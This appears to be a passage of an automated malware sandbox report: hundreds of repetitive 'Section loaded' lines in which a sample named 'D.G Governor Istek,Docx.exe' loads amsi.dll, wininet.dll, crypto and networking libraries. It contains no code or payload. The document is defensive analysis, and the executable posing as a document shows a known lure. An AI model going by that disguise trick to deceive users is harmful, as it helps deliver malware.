          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
